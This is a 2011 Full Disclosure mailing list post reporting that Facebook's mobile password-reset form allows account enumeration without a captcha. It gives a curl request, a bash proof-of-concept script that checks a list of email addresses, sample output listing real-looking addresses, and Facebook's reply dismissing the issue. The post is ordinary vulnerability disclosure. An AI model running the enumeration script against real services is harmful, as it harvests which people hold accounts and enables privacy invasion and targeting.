Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

[Facebook] password recovery without a captcha nor security tokens

From: "Zerial." <fernando () zerial org>
Date: Tue, 02 Aug 2011 11:53:26 -0400
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Facebook doesn't ensures the user information may
not be collected by any bot or any automated process. Even though you
can protect from this kind of attacks using captchas or tokens security
into the forms.

Step by step:

- - Go to http://m.facebook.com

- - Go to "Forgot your password" (http://m.facebook.com/reset.php?refid=0)

- - Try using a real email address and try to use a fake email address,
you will see two differents behavior.

Well, now try to do a POST request to
http://m.facebook.com/reset.php?refid=0 passing a email address through
"ep" variable.

Using cURL:

curl -s -d "ep=test () mail com" http://m.facebook.com/reset.php?refid=0


This process has no validation for external or forgery site/form.


Using the script:

#--------------------
#!/bin/bash
for mail in $(cat $1);
do
        s=$(curl -s -d "ep=$mail" http://m.facebook.com/reset.php?refid=0|grep
form>/dev/null);
        if [ $? -eq 0 ]; then
                echo "$mail No tiene cuenta.";
        else
                echo "$mail Si tiene cuenta.";
        fi
done

#+----- EOF ------+


You can ennumerate users by using a list of email address or phone numbers.

$ sh poc.sh mails.txt
putita666 () yahoo com NO
chapalapachala () gmail com YES
esteban.gutierrez () gmail com YES
casatola () gmail com YES
casacasa () gmail com NO
berpnarf () hotmail com NO
asdfgsdfgerT () asdfgh com NO




Into the full version of facebook http://www.facebook.com this option is
protected by a captcha to verify that we are human, in the mobile,
version this validation doesn't exists. Facebooks says:

[copy&paste]
"Hi,

While this style of information disclosure vulnerability may be
applicable at a financial or banking website, it is a core part of
the experience on social networks that are designed to connect email
addresses to users. As another example, someone who desires to obtain
this type of information could first load all of the email addresses
into a throw-away email address book, and then utilize our contact
importer tool. Requiring the registration of an account would not
provide any significant additional friction.

Alex Security Facebook"


Details in
http://www.securitybydefault.com/2011/08/busqueda-automatizada-de-cuentas.html

Cheers,
- -- 
Zerial
Seguridad Informatica
GNU/Linux User #382319
Blog: http://blog.zerial.org
Jabber: zerial () jabberes org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAk44HXUACgkQIP17Kywx9JTfzwCgmpOtiEirsLQhWBON05rbVNtH
XskAnAzjwC8gMJgajSUyEW7J7rxfjCZL
=hGpN
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: